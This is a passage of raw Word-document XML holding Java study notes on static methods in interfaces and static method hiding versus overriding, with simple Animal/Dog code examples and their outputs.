    <w:p w14:paraId="7B4B440E"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MyInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117EBE15"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tatic method in interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464EDBCF"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atic void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53662B"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This is a static method in the interface.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8374E2"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A27E634"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7B74C82" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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of Static Method in Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFED51D"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442BB16"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tatic method in the interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F101714"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atic void describe() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57523D2B"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Animals are living organisms.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090191D6"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C4471D9"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8D040AA" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384D8164"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Dog implements Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069A5AF"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n implement instance methods from Animal, but static methods are not inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005E192"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CAB8451" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFFEEF2"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677E7362"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791D5CA7"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 Calling static method of the interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76785BA4"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nimal.describe(); // Output: Animals are living organisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02608EDB"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D5506CE"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1F2DCDC" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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94DCA4C">
          <v:rect id="_x0000_i1386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FD476" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356AC54" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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the Animal interface, there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> called describe().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1DD6EC" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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is method is called using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interface name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Animal.describe()), not by creating an instance of the interface or its implementing class (Dog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB15B8" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in interfaces can only be invoked using the interface name itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D0298" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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856BAA6">
          <v:rect id="_x0000_i1387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16295764" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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y Use Static Methods in Interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A4675" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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tility Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods can be used for utility or helper methods that are related to the interface but do not depend on any instance of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DDA02" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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venience</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows grouping related static functionality inside the interface, even though interfaces don't usually contain concrete methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E160F5" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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24341A7">
          <v:rect id="_x0000_i1388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="685175DC" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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Important Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823777A" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not inherited by implementing classes. You cannot override or access a static method through an instance of a class implementing the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB5525" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ault Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be overridden, but static methods </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE2D67" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005D509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93A8B39">
          <v:rect id="_x0000_i1389" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E406A" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc196307608"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we override the static method?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="5EFC6C9D" w14:textId="3E68D69D" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">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static methods cannot be overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java. Static methods are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class-level methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolved at compile-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that the method is bound to the class, not to instances of the class. Therefore, static methods are not part of the instance's behavior and cannot be overridden in the same way that instance methods can.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DFAF29" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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y Can't Static Methods Be Overridden?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F6F7D" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Methods Belong to the Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods are tied to the class itself, not to instances of the class. When you call a static method, it is associated with the class, not with the object of that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56750612" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 Resolution at Compile-Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Static methods are resolved at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compile-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, based on the class type. The JVM doesn't use the runtime type of the object to resolve static methods, which means the method cannot be dynamically dispatched like instance methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276BD73" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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heritance of Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Static methods can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not overridden) in the subclass. A subclass can define a static method with the same signature as the parent class, but this is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not overriding. The method in the subclass does not override the method in the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004EC79D" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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6BC0B51">
          <v:rect id="_x0000_i1390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="694C758D" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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of Static Method Hiding (Not Overriding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35467FCF"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA20B67"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tatic method in parent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C5B24"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atic void sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C613D22"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Animal makes a sound.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49731F03"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07991E0"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2DE2BC5" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104205E7"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE92085"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tatic method in child class (hides the parent static method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D917199"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atic void sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFC7E9"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Dog barks.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64FA81"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BEAFDED"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11C6FDA" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFBB053"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64A8277C"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21FFA25B"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lling static methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67043C85"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Animal.sound();  // Output: Animal makes a sound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2892B4C0"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og.sound();     // Output: Dog barks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CFBF3"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BCA56B9"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tatic methods are resolved at compile-time, based on the reference type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6DA896"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nimal animal = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E950DE"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nimal.sound();  // Output: Animal makes a sound. (Not Dog barks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D02E56"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78E8357"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151823C" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE2BA2" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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sound() method in the Animal class is static, and Dog also defines a static sound() method, which </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parent class method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DCDF29" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Even though the animal reference is pointing to a Dog object, the method called is based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reference type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Animal), not the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Dog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A04A8" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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is behavior is known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not overriding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314175ED" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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p w14:paraId="3755D738"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nimal makes a sound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E5C2D"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og barks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54932C92" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094"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nimal makes a sound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D21D18E" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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70B0974">
          <v:rect id="_x0000_i1391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570F960" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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Takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B819C" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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verriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (non-static methods) can be overridden in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C481E2D" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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iding Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
